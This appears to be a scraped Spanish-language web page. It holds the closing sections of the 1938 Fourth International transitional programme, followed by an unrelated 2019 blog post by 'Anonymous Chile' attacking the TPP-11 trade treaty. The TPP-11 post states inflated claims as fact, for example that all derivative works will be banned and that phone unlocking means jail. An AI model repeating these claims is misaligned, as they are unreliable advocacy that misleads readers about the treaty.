El peso específico de las diversas reivindicaciones democráticas y transitorias en la lucha del proletariado, su ligazón recíproca, su orden de sucesión, está determinado por las particularidades y condiciones propias de cada país atrasado, en una parte considerable, por su grado de atraso. No obstante la dirección general del desarrollo revolucionario puede ser determinada por la fórmula de la revolución permanente en el sentido que definitivamente han dado a esta fórmula las tres revoluciones de Rusia (1905, febrero de 1917 y octubre de 1917).

La Internacional «Comunista» ha dado a los países atrasados el ejemplo clásico de la manera cómo se puede causar la ruina de una revolución llena de fuerza y de promesas cuando en la impetuosa alza del movimiento de masas en China en 1925-1927. la I.C. no lanzó la consigna de la Asamblea nacional y al mismo tiempo prohibió la formación de los soviets. El partido burgués del Kuo-Min-Tang debía según el plan de Stalin «reemplazar» a la vez a la Asamblea Nacional y a los Soviets. Después del hundimiento inevitable de la insurrección de Cantón. la I.C. tomó el camino de la guerra de guerrillas y de los soviets campesinos con una completa pasividad del proletariado industrial. Conducida por este camino a una impasse la I.C. aprovechó la guerra Chino-Japonesa para liquidar de un plumazo la «China Soviética» subordinando no solamente el «Ejercito Rojo» campesino sino también el llamado partido Comunista al Kuo-Min-Tang mismo, es decir de la burguesía.

Después de haber traicionado a la revolución proletaria internacional en nombre de la amistad con los esclavistas democráticos, el KOMINTERN no podía dejar de traicionar igualmente la lucha emancipadora de los pueblos coloniales con un cinismo mucho mayor que con el que lo hiciera antes la II Internacional. La política de los “Frentes Populares” y de la «Defensa Nacional » tiene como uno de sus objetivos hacer con las centenas de millones de hombres de la población colonial, carne de cañón para el imperialismo democrático. La bandera de la lucha de la emancipación de los pueblos coloniales, es decir, de más de la mitad de la humanidad, pasa definitivamente a manos de la IV Internacional

El programa de reivindicaciones transitorias en los países fascistas

Ha pasado bastante tiempo desde que los estrategas de la I.C. proclamaron que la victoria de Hitler no era más que un paso hacia la victoria de Thaelman. Más de 5 años lleva pasados Thaelman en las prisiones de Hitler. Mussohni mantiene a Italia bajo el fascismo desde hace más de 16 años. Mientras tanto, todos los partidos de la Segunda y Tercera Internacionales se han mostrado impotentes no solamente para provocar un movimiento de masas sino también para crear una organización ilegal seria que pueda compararse, aunque sólo sea en cierta medida a los partidos revolucionarios rusos de la época del zarismo.

No hay ninguna razón para ver la causa de estos fracasos en la potencia de la ideología fascista. Mussolini no tuvo jamás ideología alguna y la ideología de Hitler nunca ha sido tomada en serio por los obreros. Las capas de la población a las que el fascismo, en un momento dado, había seducido, es decir, las clases medias, sobre todo, han tenido tiempo de desilucionarse. El hecho de que la pequeña oposición existente se limite a los medios clericales protestantes y católicos, no se explica por la potencia de las teorías semi-delirantes, semi-charlatanescas de la «raza’, y de la «sangre» sino ideologías de la democracia y del KOMINTERN.

Después del hundimiento de la Comuna de Paris, una reacción aplastante se prolongó cerca de 8 años. Después de la derrota de la revolución rusa en 1905 las masas obreras quedaron abatidas por casi el mismo tiempo. No obstante en los dos casos no se trató más que de derrotas físicas determinadas por la correlación de fuerzas. En Rusia se trataba, por otra parte, de un proletariado casi virgen. La fracción de los Bolcheviques no contaba entonces más de tres años. La situación era completamente diferente en Alemania donde la dirección pertenecía a potentes partidos los cuales uno tenía 70 años de existencia y el otro cerca de 15. Estos dos partidos que tenían millones de electores se encontraron moralmente paralizados ante la lucha y se rindieron sin combate. No ha habido jamás catástrofe parecida en la historia el proletariado alemán no ha sido batido por el enemigo en un combate; ha sido destruido por la cobardía, la abyección, la traición de sus propios partidos. Nada de extraño tiene que haya perdido la fe en todo lo que estaba habituado a creer desde hace casi tres generaciones. La victoria de Hitler a su vez ha reforzado a Mussolini.

La falta de éxito real del trabajo revolucionario en Italia y en Alemania no tiene otra razón que la política criminal de la social democracia y del Comintern. Para realizar un trabajo ilegal es necesario no solamente la simpatía de las masas, sino también el entusiasmo consciente de sus capas más avanzadas. ¿Pero puede esperarse el entusiasmo en organizaciones que históricamente están en quiebra? Los jefes emigrados son sobre todo agentes del Kremlin o de la G.P.U., desmoralizados hasta la médula de los huesos, o antiguos ministros social-demócratas de la burguesía, que esperan que el milagro los obreros le devolverán sus puestos perdidos. ¿Es posible imaginar, aunque sólo sea por un momento a estos señores en el papel de futuros líderes de la revolución anti­fascista?

Los acontecimientos sobre la arena mundial tampoco han favorecido una conmoción revolucionaria en Italia y Alemania: aplastamiento de los obreros austria­cos, derrota de la revolución española, degeneración del Estado Soviético. En la medida en que los obreros italianos y alemanes dependen de la radio para su información política, se puede decir con seguridad que las emisiones de Moscú, que combinan la mentira termidoriana a la estupidez y la impotencia, constituyen un potente factor de desmoralización para los obreros de los países totalitarios. En este aspecto como en otros Stalin no es más que un auxiliar de Goebbels.

No obstante, los antagonismos de clase que han conducido a la victoria del fascismo, continúan su trabajo aún bajo su dominación y lo roen poco a poco. El descontento de las masas crece. Centenares de miles de obreros abnegados continúan, a pesar de todo, un trabajo prudente de topos revolucionarios. Jóvenes generaciones que no han sufrido directamente el hundimiento de las grandes tradiciones y de las grandes esperanzas, se levantan. La preparación molecular de la revolución está en marcha bajo la pesada loza del régimen totalitario. Pero para que la energía escondida se transforme en movimiento, es necesario que la vanguardia del proletariado haya encontrado una nueva perspectiva, un nuevo régimen, un nuevo programa, una nueva bandera sin tacha.

Es esta la principal dificultad. Es extremadamente difícil para los obreros de los países fascistas orientarse en los nuevos programas. La verificación de un programa se hace por la experiencia. Es precisamente la experiencia del movimiento de masas lo que falta en los países de despotismo totalitario. Es muy probable que sea necesario un gran éxito del proletariado en uno de los países «democráticos» para dar un impulso al movimiento revolucionario en los países dominados por el fascismo.

Una catástrofe financiera o militar puede tener el mismo efecto. Es necesario realizar actualmente un trabajo preparatorio, sobre todo de propaganda, que no dará frutos abundantes sino en el porvenir.

Desde ya se puede afirmar con plena certeza: una vez que haya alumbrado el gran día, el movimiento revolucionario en los países fascistas tomará de golpe una extensión grandiosa y no se detendrá para resucitar cadáveres como el de Weimar.

Es sobre este punto que comienza la divergencia irreductible entre la IV Internacional y los viejos partidos que sobreviven físicamente a su bancarrota. El «Frente Popular» en la emigración es una de las variedades más nefastas y más traidoras de todos los frentes populares posibles. Significa en el fondo la nostalgia impotente de una coalición con una burguesía liberal inexistente. Si tuviera algún éxito, no habría más que preparar una serie de nuevas derrotas del proletariado a la manera española. Es por eso que la propaganda despiadada contra la teoría y la práctica del Frente Popular es la primera condición de la lucha revolucionaria contra el fascismo.

Esto no significa que la IV Internacional rechace las consignas democráticas. Al contrario, y en todas partes bajo su propia bandera. Propone abiertamente su programa al proletariado de los países fascistas. Desde ahora los obreros avanzados del mundo entero están firmemente convencidos que el derrumbamiento de Mussolini y de Hitler y de sus agentes e imitadores, se producirá bajo la dirección de la IV Internacional.

La situación de la URSS y las tareas de la época de transición

La Unión Soviética ha salido de la revolución de Octubre como un Estado obrero. La propiedad estatal de los medios de producción, condición necesaria del desarrollo socialista, ha abierto la posibilidad de un crecimiento rápido de las fuerzas productivas. El aparato del Estado obrero, aislado, sufrió mientras tanto una completa degeneración, transformándose de instrumento de la clase obrera, en instrumento de violencia burocrática contra la clase obrera y en forma creciente, en instrumento de sabotaje de la economía. La burocratización de un Estado obrero, atrasado y aislado, y la transformación de la burocracia en casta privilegiada omnipotente, es la refutación más convincente -no solamente teórica sino práctica- de la teoría del socialismo en un solo país.

Así, el régimen de la URSS encierra contradicciones amenazantes. Pero continúa siendo un régimen de Estado Obrero degenerado. Tal es el diagnóstico social.

El pronóstico político tiene un carecer alternativo: o la burocracia se transforma cada vez más en órgano de la burguesía mundial dentro del Estado Obrero, derriba las nuevas formas de propiedad y vuelve el país al capitalismo; o la clase obrera aplasta a la burocracia y abre el camino hacia el socialismo.

Para las secciones de la IV Internacional los procesos de Moscú no son una sorpresa, ni el resultado de la demencia personal del dictador del Kremlin, sino los productos legítimos del Termidor. Han nacido de fricciones intolerables que existen en el interior de la burocracia soviética, fricciones que a su vez reflejan las contradicciones entre la burocracia y el pueblo y también los antagonismos que se profundizan en el seno del mismo «pueblo». La naturaleza sangrienta y fantástica de los juicios dan el grado de intensidad de esas contradicciones y predicen la proximidad del desenlace.

Las declaraciones públicas de ex agentes del Kremlin en el extranjero que se han negado a regresar a Moscú, han confirmado irrefutablemente, de su parte, que en el seno de la burocracia existen todos los matices del pensamiento político: desde el verdadero bolchevismo (I. Reiss) hasta el fascismo acabado (Th. Butenko). Los elementos revolucionarios de la burocracia, que constituyen una ínfima minoría, reflejan, pasivamente, es cierto, los intereses socialistas del proletariado. Los elementos fascistas contrarrevolucionarios, cuyo número aumenta sin cesar, expresan en forma cada vez más consecuente los intereses del imperialismo mundial. Estos candidatos al rol de «compradores» piensan, no sin razón, que la nueva capa dirigente no puede asegurar su posición privilegiada sin renunciar a la nacionalización, a la colectivización y al monopolio del comercio exterior en nombre de la asimilación de la «civilización occidental», vale decir, del capitalismo. Entre estos dos polos se reparten las tendencias intermedias, más o menos vagas, de carácter menchevique, socialista-revolucionario o liberal, que gravitan hacia la democracia burguesa.

En la llamada sociedad «sin clases» existen, sin ninguna duda, los mismos agrupamientos que en la burocracia, pero con una expresión menos clara y expresados en proporción inversa: son las tendencias capitalistas concientes, predominantes sobre todo, en las capas más prósperas de los kolkoses, pero que representan una pequeña minoría de la población. Pero encuentran una amplia base en las tendencias pequeño burguesas a la acumulación que nacen de la miseria general y que la burocracia alienta concientemente.

Sobre este sistema de antagonismo crecientes que destruyen, cada vez más, el equilibrio social, se mantiene, por métodos de terror, una oligarquía termidoriana, que por ahora se reduce sobre todo a la camarilla bonapartista de Stalin.

Los últimos procesos han sido un golpe contra la izquierda. Esto es cierto también respecto a la represión contra los jefes de la oposición de derecha, porque desde el punto de vista de los intereses y de las tendencias de la burocracia, el grupo de derecha del viejo partido bolchevique, representa un peligro de izquierda. El hecho de que la camarilla bonapartista, temerosa también de sus aliados de derecha, del género de Butenko, se haya visto obligada, para asegurar su mantenimiento, a recurrir a la exterminación, casi general de la vieja generación de bolcheviques es la prueba indiscutible de la vitalidad de las tradiciones revolucionarias en las masas y del descontento creciente de las mismas.

Los demócratas pequeño-burgueses de Occidente, que aceptaban todavía ayer los procesos de Moscú como moneda corriente, repiten ahora con insistencia que “en la U.R.S.S. no hay trotskismo ni trotskistas”. Pero no explican por qué, toda la depuración se hace bajo el signo de la lucha contra este peligro. Si se toma el “trotskismo” como un programa acabado y con más razón como una organización, “el trotskismo” es sin duda, en la U.R.S.S., extremadamente débil. No obstante, su fuerza invencible reside en ser la representación, no solamente de la tradición revolucionaria, sino también de la oposición actual de la clase obrera. El odio social de los obreros por la burocracia, es precisamente lo que a los ojos de la camarilla staliniana es el trotskismo. Teme mortalmente, y con mucha razón, la vinculación de la sorda indignación de los trabajadores con la organización de la IV Internacional.

La exterminación de la vieja generación de bolcheviques y de representantes revolucionarios de la generación media y joven ha destruido todavía más el equilibrio político en favor a la derecha, burguesa, de la burocracia, en todo el país. Es de ahí, es decir, de la derecha, que se puede esperar en el próximo periodo, tentativas cada vez más resueltas de reconstruir el régimen social de la U.R.S.S. aproximándolo a la “civilización occidental”, ante todo en su forma fascista.

Esta perspectiva da un carácter muy concreto a la cuestión de la «defensa de la U.R.S.S.». Si mañana el grupo burgués-fascista o, por así decir, la «fracción Butenko» entra en la lucha por la conquista del poder, la «fracción Reiss» tomará inevitablemente su lugar del otro lado de la barricada. Siendo momentáneamente el aliado de Stalin, esta última defendería, no a la camarilla bonapartista de éste, sino la base social de la U.R.S.S., es decir, la propiedad arrancada a los capitalistas y transformada en propiedad del Estado. Si la «fracción Butenko» se encuentra en alianza militar con Hitler, la «fracción Reiss» defenderá a la U.R.S.S. contra la intervención militar, en el interior de la U.R.S.S. como sobre la arena mundial. Cualquier otra conducta sería una traición.

No es posible negar por adelantado la posibilidad, en casos estrictamente determinados, de un «frente único» con la parte termidoriana de la burocracia contra la ofensiva abierta de la contra revolución capitalista, pero la tarea política principal en la U.R.S.S. sigue siendo, a pesar de todo, el derrocamiento de la burocracia termidoriana. Cada día añadido a su dominación contribuye a socavar los cimientos de los elementos socialistas de la economía y aumentar las posibilidades de la restauración capitalista. En el mismo sentido gravita la Internacional «Comunista» agente y cómplice de camarilla stalinista en el sofocamiento de la revolución española y la desmoralización del proletariado internacional.

Al igual que en los países fascistas, la principal fuerza de la burocracia no está en ella misma, sino en el desaliento de las masas, en la falta de una perspectiva nueva. Al igual que en los países fascistas, de los cuales el aparato político de Stalin difiere sólo en ser de una crudeza más desenfrenada, sólo un trabajo preparatorio de propaganda es actualmente posible en la U.R.S.S. Al igual que en los países fascistas, la impulsión para el movimiento revolucionario de los obreros soviéticos será dada, muy probablemente, por acontecimientos exteriores. La lucha contra el KOMINTERN sobre la arena mundial es actualmente la parte más importante de la lucha contra la dictadura stalinista. Muchos indicios permiten creer que la disgregación del KOMINTERN, que no tiene apoyo directo en la G.P.U., precederá la caída de la camarilla bonapartista y de toda la burocracia termidoriana en general.

El nuevo auge de la revolución en la U.R.S.S. comenzará sin ninguna duda, bajo la bandera de la lucha contra la desigualdad social y la opresión política.

¡Abajo los privilegios de la burocracia!

¡Abajo el stajanovismo!

¡Abajo la aristocracia soviética con sus grados y decoraciones!

¡Más igualdad en el salario de todas las formas de trabajo!

La lucha por la libertad de los sindicatos y los comités de fábrica, por la libertad de reunión y de prensa, se desarrollará en lucha por el renacimiento y regeneración de la democracia soviética.

La burocracia ha reemplazado a los soviets, en sus funciones de órgano de clase, por la ficción del sufragio universal, al estilo de Hitler-Goebbels. Es necesario devolver a los soviets no solamente su libre forma, democrática, sino también su contenido de clase. De la misma manera que antes la burguesía y los Kulaks no eran admitidos en los soviets, ahora la burocracia y la nueva aristocracia deben ser arrojada de los soviets. En los soviets no hay lugar más que para los obreros, para los miembros de base de los Koljoses, los campesinos y los soldados rojos.

La democratización de los soviets es inconcebible sin la legalización de los partidos soviéticos. Los obreros y los campesinos, por sí mismos y por su libre sufragio decidirán qué partidos serán considerados como partidos soviéticos.

¡Revisión completa de la economía planificada en interés de los productores y consumidores! Se debe devolver el derecho de control de la producción a los Comités de fábrica. La cooperativa de consumos, democráticamente organizada, debe controlar la calidad de los productos y sus precios.

¡Reorganización de los Koljoses de acuerdo con la voluntad e interés de los trabajadores que los integran!

La política internacional conservadora de la burocracia debe ser reemplazada por la política del internacionalismo proletario. Toda la correspondencia diplomática del Kremlin debe ser publicada. ¡Abajo la diplomacia secreta!

Todos los procesos políticos montados por la burocracia termidoriana deben ser revisados, bajo una publicidad completa y un libre examen. Los organizadores de las falsificaciones deben sufrir el merecido castigo.

Es imposible realizar este programa sin el derrocamiento de la burocracia que se mantiene por la violencia y la falsificación. Sólo el levantamiento revolucionario victorioso de las masas oprimidas puede regenerar el régimen soviético y asegurar la marcha adelante hacia el socialismo. Sólo el partido de la IV Internacional es capaz de dirigir a las masas soviéticas a la insurrección.

¡Abajo la camarilla bonapartista del Caín-Stalin!

¡Viva la democracia soviética!

¡Viva la revolución socialista internacional!

Contra el oportunismo y el revisionismo sin principios

La política del partido de León Blum en Francia demuestra nuevamente que los reformistas son incapaces de aprender nada de las lecciones de la historia. La social democracia francesa copia servilmente la política de la social democracia alemana y marcha hacia la misma catástrofe. En las últimas décadas, la Segunda Internacional ha ligado estrechamente su destino al régimen democrático burgués y está pudriéndose a la par de él.

La Tercera Internacional ha entrado en el camino del reformismo precisamente ahora que la crisis del capitalismo ha puesto definitivamente en el orden del día a la revolución proletaria. La política actual de la II Internacional en España y en China, que consiste en arrastrarse ante la burguesía «nacional» y «democrática», revela que ésta tampoco es capaz de cambiar ni de aprender nada. La burocracia, que en la U.R.S.S. se ha convertido en una fuerza reaccionaria, no puede desempeñar un papel revolucionario en el orden internacional.

En su conjunto, el anarcosindicalismo ha experimentado una evolución del mismo género. En Francia, la burocracia sindical de León Jouhaux desde hace mucho tiempo se ha convertido en una agencia de la burguesía en el seno de la clase obrera. En España, el anarcosindicalismo se desprendió de su revolucionarismo de fachada, desde que apareció la revolución, y se convirtió en la quinta rueda del carro de la democracia burguesa.

Las organizaciones intermedias centristas, que se agrupan en torno al Bureau de Londres, no son más que apéndices «izquierdistas», poniendo en evidencia su absoluta incapacidad para orientarse en una situación histórica y deducir conclusiones revolucionarias. Su punto culminante fue alcanzado por el P.O.U.M. español que frente a una situación revolucionaria resultó ser completamente incapaz de tener una política revolucionaria. Las trágicas derrotas que el proletariado mundial viene sufriendo desde hace una larga serie de años han llevado a las organizaciones oficiales a un conservadurismo todavía más acentuado y, al mismo tiempo, a los «revolucionarios» pequeño-burgueses decepcionados, a buscar «nuevos» caminos. Como siempre en las épocas de reacción y decadencia, por todas partes aparecen magos y charlatanes que quieren revisar todo el desenvolvimiento del pensamiento revolucionario. En lugar de aprender del pasado, lo «corrigen». Unos descubren la inconsistencia del marxismo, otros proclaman la quiebra del bolchevismo. Unos adjudican a la doctrina revolucionaria la responsabilidad de los crímenes y errores de quienes lo traicionan. Otros maldicen a la medicina porque no asegura una curación inmediata y milagrosa. Los más audaces prometen descubrir una panacea y mientras tanto recomiendan que se detenga la lucha de clases. Numerosos profetas de la nueva moral se disponen a regenerar al movimiento obrero con ayuda de una homeopatía ética. La mayoría de estos apóstoles se han convertido en inválidos morales sin batalla. Así, con el ropaje de revelaciones deslumbradoras no se ofrecen al proletariado más que viejas recetas enterradas desde hace mucho tiempo en los archivos del socialismo anterior a Marx.

La IV Internacional declara una guerra implacable a las burocracias de la II y de la III Internacionales, de la Internacional de Amsterdam y de la Internacional anarcosindicalista, lo mismo que a sus satélites centristas; al reformismo sin reformas, al democratismo aliado a la G.P.U., al pacifismo sin paz, al anarquismo al servicio de la burguesía, a los «revolucionarios» que temen mortalmente a la revolución. Todas estas organizaciones no son promesas del porvenir sino supervivencias podridas del pasado. La época de las guerras y de las revoluciones no dejará ni rastros de ellas.

La IV Internacional no busca ni inventa ninguna panacea. Se mantiene enteramente en el terreno del marxismo, única doctrina revolucionaria que permite comprender la realidad, descubrir las causas de las derrotas y preparar conscientemente la victoria. La IV Internacional continúa la tradición del bolchevismo que por primera vez mostró al proletariado cómo conquistar el poder. La Cuarta Internacional desecha a los magos, charlatanes y profesores de moral. En una sociedad basada en la explotación, la moral suprema es la de la revolución socialista. Buenos son los métodos que elevan la conciencia de clase de los obreros, la confianza en sus fuerzas y su espíritu de sacrificio en la lucha. Inadmisibles son los métodos que inspiran el miedo y la docilidad de los oprimidos contra los opresores, que ahogan el espíritu de rebeldía y de protesta, o que reemplazan la voluntad de las masas por la de los jefes, la persuasión por la coacción y el análisis de la realidad por la demagogia y la falsificación. He aquí por qué la social democracia, que ha prostituido el marxismo tanto como el stalinismo, antítesis del bolchevismo, son los enemigos mortales de la revolución proletaria y de la moral de la misma.

Mirar la realidad cara a cara, no buscar la línea de la menor resistencia, llamar a las cosas por su nombre, decir la verdad a las masas por amarga que ella sea, no temer los obstáculos, ser fiel en las pequeñas y en las grandes cosas, ser audaz cuando llegue la hora de la acción, tales son las reglas de la IV Internacional. Ella ha mostrado que sabe marchar contra la corriente. La próxima ola histórica la pondrá sobre su cresta.

Contra el sectarismo

Bajo la influencia de la traición y de la degeneración de las organizaciones históricas del proletariado, en la periferia de la IV Internacional han nacido o han degenerado grupos y formaciones sectarias de diferentes géneros. En su base estos núcleos se niegan a luchar por los intereses y las necesidades elementales de las masas, tal como ellas son. La preparación de la revolución significa para los sectarios convencerse a sí mismos de las ventajas del socialismo. Proponen volver la espalda a los viejos sindicatos, esto es, a decenas de millones de obreros. ¡Como si las masas pudieran vivir fuera de las condiciones reales de la lucha de clases! Permanecen indiferentes ante la lucha interna de las organizaciones reformistas. ¡Como si se pudiera conquistar a las masas sin intervenir en esa lucha! Se rehúsan a hacer en la práctica una diferencia entre la democracia burguesa y el fascismo. ¡Cómo si las masas no sintieran esa diferencia a cada paso!

Los sectarios sólo son capaces de distinguir dos colores: el blanco, y el negro. Para no exponerse a la tentación, simplifican la realidad. Rehúsan establecer diferencias entre los campos en lucha en España por la razón de que los dos campos tienen un carácter burgués. Y piensan, por la misma razón, que es necesario permanecer neutral en la guerra de Japón contra China. Niegan la diferencia de principios entre U.R.S.S. y los países burgueses y se rehúsan, vista la política reaccionaria de la burocracia soviética, a defender contra el imperialismo las formas de propiedad creadas por la revolución de Octubre.

Incapaces de encontrar acceso a las masas las acusan de incapacidad para elevarse hasta las ideas revolucionarias. Estos profetas estériles no ven la necesidad de tender el puente de las reivindicaciones transitorias, porque tampoco tienen el propósito de llegar a la otra orilla. Como mula de noria, repiten, constantemente las mismas abstracciones vacías. Los acontecimientos políticos no son para ello la ocasión de lanzarse a la acción, sino de hacer comentarios. Los sectarios del mismo modo que los conlusionistas y los magos, al ser constantemente desmentidos por la realidad, viven en un estado de continua irritación, se lamentan incesantemente del «régimen» y de los «métodos» y se dedican a mezquinas intrigas. Dentro de su propio círculo, estos señores comúnmente ejercen un régimen despótico. La postración política del sectarismo no hace más que seguir como una sombra a la postración del oportunismo, sin abrir perspectivas revolucionarias. En la política práctica los sectarios se unen a cada paso a los oportunistas, sobre todo a los centristas, para luchar contra el marxismo.

La mayoría de los grupos y camarillas sectarias de esta índole, que se nutren de las migajas caídas de la mesa de la IV Internacional, llevan una existencia organizativa «Independiente» con grandes pretensiones, pero sin la menor posibilidad de éxito. Sin perder su tiempo, los bolcheviques leninistas pueden abandonarlos tranquilamente a su propia suerte.

No obstante, también en nuestras propias filas se encuentran tendencias que ejercen una influencia funesta sobre el trabajo de algunas secciones. Es algo que no debe tolerarse un solo días más. La condición fundamental para pertenecer a la IV Internacional es una política justa respecto de los sindicatos. El que no busca ni encuentra el camino del movimiento de masas no es combatiente sino un peso muerto para el partido. Un programa no se crea para las redacciones, las salas de lectura o los centros de discusión, sino para la acción revolucionaria de millones de hombres. La premisa necesaria de los éxitos revolucionarios es la depuración de la IV Internacional del sectarismo y de los sectarios incorregibles.

¡Paso a la juventud! ¡paso a las mujeres trabajadoras!

La derrota de la revolución española, provocada por sus “jefes”, la bancarrota vergonzosa del frente popular en Francia y la divulgación de los actos de bandidaje judicial de Moscú, son hechos que en su conjunto asestan a la III Internacional un golpe irreparable y, de paso, causan graves heridas a sus aliados, los socialdemócratas y los anarcosindicalistas. Desde luego, esto no significa que los integrantes de esas organizaciones se orientarán bruscamente hacia la IV Internacional. La generación más vieja, que ha sufrido un terrible descalabro, en su mayor parte abandonará el frente de batalla. De otra parte, la IV Internacional, de ningún modo aspira a transformarse en un refugio de inválidos revolucionarios, burócratas y arribistas decepcionados. Por el contrario, contra la afluencia a nuestras filas de los elementos pequeño-burgueses que dominan en los aparatos dirigentes de las viejas organizaciones, es preciso adoptar las más estrictas medidas preventivas; un largo periodo de prueba para los candidatos que no son obreros, sobre todo, si se trata de ex-burócratas; prohibición de que ocupen puestos responsables en el partido durante los tres primeros años, etc… En la IV Internacional no hay lugar para el arribismo, cáncer de las viejas internacionales. Sólo encontrarán cabida en nuestras filas aquellos que quieran vivir para el movimiento y no a expensas del mismo.

Las puertas de la organización están completamente abiertas para los obreros revolucionarios, que son quienes deben sentirse dueños de la misma. Claro está que aún entre los obreros que en un tiempo ocuparon las primeras filas, actualmente hay no pocos fatigados y decepcionados. Por lo menos en su próximo periodo se mantendrán apartados. Con el desgaste del programa y de la organización manteniendo sobre sus hombros. El movimiento se renueva con la juventud, libre de toda responsabilidad del pasado.

La IV Internacional presta una atención y un interés particularísimo a la joven generación del proletariado. Toda su política se esfuerza por inspirar a la juventud confianza en sus propias fuerzas y en su porvenir. Sólo el entusiasmo fresco y el espíritu beligerante de la juventud pueden asegurar los primeros triunfos de la lucha y sólo éstos devolverán al camino revolucionario a los mejores elementos de la vieja generación. Siempre fue así y siempre será así.

La marcha de las cosas lleva a todas las organizaciones oportunistas a concentrar su interés en las capas superiores de la clase obrera, y, en consecuencia, ignoran tanto a la juventud como a las mujeres trabajadoras. Ahora bien, la época de la declinación del capitalismo asesta a la mujer sus más duros golpes tanto en su condición de trabajadora como de ama de casa. Las secciones de la IV Internacional deben buscar apoyo en los sectores más oprimidos de la clase trabajadora, y por tanto, entre las mujeres que trabajan. En ellas encontrarán fuentes inagotables de devoción, abnegación y espíritu de sacrificio.

¡Abajo el burocratismo y el arribismo!

¡Paso a la juventud!

¡Paso a la mujer trabajadora!

Tales son las consignas inscritas en la bandera de la Cuarta Internacional.

Bajo la bandera de la cuarta internacional

Los escépticos preguntan: ¿Pero ha llegado el momento de crear una nueva Internacional? Es imposible, dicen, crear «artificialmente» una Internacional. Sólo pueden hacerla surgir los grandes acontecimientos, etc. Lo único que demuestran todas estas expresiones es que los escépticos no sirven para crear una nueva Internacional. Por lo general, los escépticos no sirven para nada.

La Cuarta Internacional ya ha surgido de grandes acontecimientos; de las más grandes derrotas que el proletariado registra en la historia. La causa de estas derrotas es la degeneración y la traición de la vieja dirección. La lucha de clases no tolera interrupciones. La Tercera Internacional, después de la Segunda, ha muerto para la revolución.

¡Viva la Cuarta Internacional!

Pero los escépticos no se callan ¿Pero ha llegado ya el momento de proclamarla? La Cuarta Internacional- respondemos- no necesita ser «proclamada». Existe y lucha. ¿Es débil? Sí, sus filas son todavía poco numerosas porque todavía es joven. Hasta ahora se compone sobre todo de cuadros dirigentes. Pero estos cuadros son la única esperanza del porvenir revolucionario, son los únicos realmente dignos de este nombre. Si nuestra Internacional es todavía numéricamente débil, es fuerte por su doctrina, por su tradición, y el temple incomparable de sus cuadros dirigentes. Que esto no se vea hoy, no tiene mayor importancia. Mañana será más evidente.

La Cuarta Internacional goza ya desde ahora del justo odio de los stalinistas, de los social-demócratas, de las liberales burgueses y de los fascistas. No tiene ni puede tener lugar alguno en ningún frente popular. Combate irreductiblemente a todos los grupos políticos ligados a la burguesía. Su misión consiste en aniquilar la dominación del capital, su objetivo es el socialismo. Su método, la revolución proletaria. Sin democracia interna no hay educación revolucionaria. Sin disciplina no hay acción revolucionaria. El régimen interior de la Cuarta Internacional se rige conforme a los principios del centralismo democrático: completa libertad en la discusión, absoluta unidad en la acción.

La crisis actual de la civilización humana es la crisis de la dirección proletaria. Los obreros revolucionarios agrupados en torno a la Cuarta Internacional señalan a su clase el camino para salir de la crisis. Le proponen un programa basado en la experiencia internacional del proletariado y de todos los oprimidos en general, le proponen una bandera sin mácula.

Obreros y Obreras de todos los países, agrupados bajo la bandera de la Cuarta Internacional.

¡Es la bandera de vuestra próxima victoria!

55 comentarios

TPP-11: Todos Podemos Perder

Publicada el 30/11/2019 - 30/11/2019 por Anonymous Chile

¿Qué es el TPP-11?

Acuerdo de AsociaciónTrans Pacífico de Libre Comercio, así lo llaman… nosotros lo conocemos por sus siglas «Todos Podemos Perder» y te explicamos por qué. Hace ya varios años que lleva dando vueltas entre la Cámara de Diputados y el Senado. En un principio las personas promedio no sabían mucho sobre él, y la poca gente que sí tenía conocimiento al respecto en realidad no podía explicarlo con exactitud… eso no es accidental. El TPP-11 es un acuerdo de supuesto comercio que se ha negociado en secreto durante años. Este tratado abarca los países: Chile, Perú, México, Brunei, Nueva Zelanda, Singapur, Australia, Malasia, Japón y Vietnam.

¿Realmente es tan malo?

Todo lo que se negocia en secreto es por algo y en muchas ocasiones podría tener consecuencias perjudiciales para el/la ciudadanx de a pie. Imagínate que el texto completo del tratado ha sido cuidadosamente escondido y censurado hasta para los legisladores que votan por él, apenas saben de qué se trata. Pues bien, en internet todo se filtra, tarde o temprano alguien nos ilumina con la verdad.

Gracias a estas filtraciones y el enorme trabajo de difusión que durante años han hecho miles de organizaciones, fundaciones, agrupaciones y comunidades en todo el mundo es que ahora es mucho más conocido que en antaño y una buena parte de la población sabe, conoce y entiende a ciencia cierta, en todo detalle y profundidad cómo afectará a los países involucrados: El TPP-11 propone instalar un sistema de tribunales comerciales por encima de toda jurisprudencia nacional, lo cual significa que cualquiera de las muchísimas empresas que negocian con el TPP-11 pueden recurrir al tribunal si las leyes de un país afectan sus ingresos. Pongamos de ejemplo a Uruguay que fue demandada por la tabacalera Phillips Morris por la publicidad que el estado obligó a poner en las cajetillas de cigarros, lo que disminuyó en un 4% el consumo de tabaco en el país. Phillips Morris ha perdido mucho dinero con esto, y ahora si dicha empresa recurre al tribunal superior con esteroides del TPP-11, el estado uruguayo perdería ante cualquier resolución de ese tribunal conformado por los mismos que lo han demandado.

Además de perder toda soberanía en manos de empresas multinacionales, los países también se verán obligados a modificar, añadir y/o anular leyes que sean contradictorias a las del tribunal y los intereses privativos de cada empresa. ¿Te gusta descargar contenido con derechos digitales? Con el TPP-11 van a poder buscarte, denunciarte, multarte y hasta llevarte a la cárcel por tener contenido protegido bajo derechos de autor en tu ordenador y ni siquiera la justicia de tu país podrá ayudarte.

Los alimentos, medicamentos farmacéuticos y semillas de cultivos agrícolas se verán severamente afectados, entre otras cosas como las descritas en la siguiente lista:

  1. Se van a incrementar de 5 a 12 los años requeridos para sacar medicamentos genéricos.
  2. Una empresa puede demandar a Chile por billones de dólares si acá se declaran leyes que perjudiquen los ingresos esperados de dicha empresa, inclusive si la respectiva ley en disputa es algo bueno para la gente.
  3. Olvídense de desbloquear sus iPhones, penado con cárcel por evadir candados digitales. Ni hablar de desbloquear consolas de vídeojuegos.
  4. Para que las obras con derecho de autor lleguen al dominio público debían transcurrir un mínimo de 50 años luego de la muerte de dicho autor. Con el TPP-11 se aumentaría a más 70 años, o desde su publicación más 120 años, lo cual es absurdo.
  5. Los dueños de material con derechos de autor pueden demandarte e incautar tus dispositivos si se te encuentra involucrado en actividad infringidora aunque no hayas participado directamente, por ejemplo si alguien se te cuelga del internet y descarga algo. La mencionada infracción podrá ser penada con multas millionarias y carcel.
  6. Cualquier tipo de trabajo derivativo de algo con derechos de autor estará prohibido.
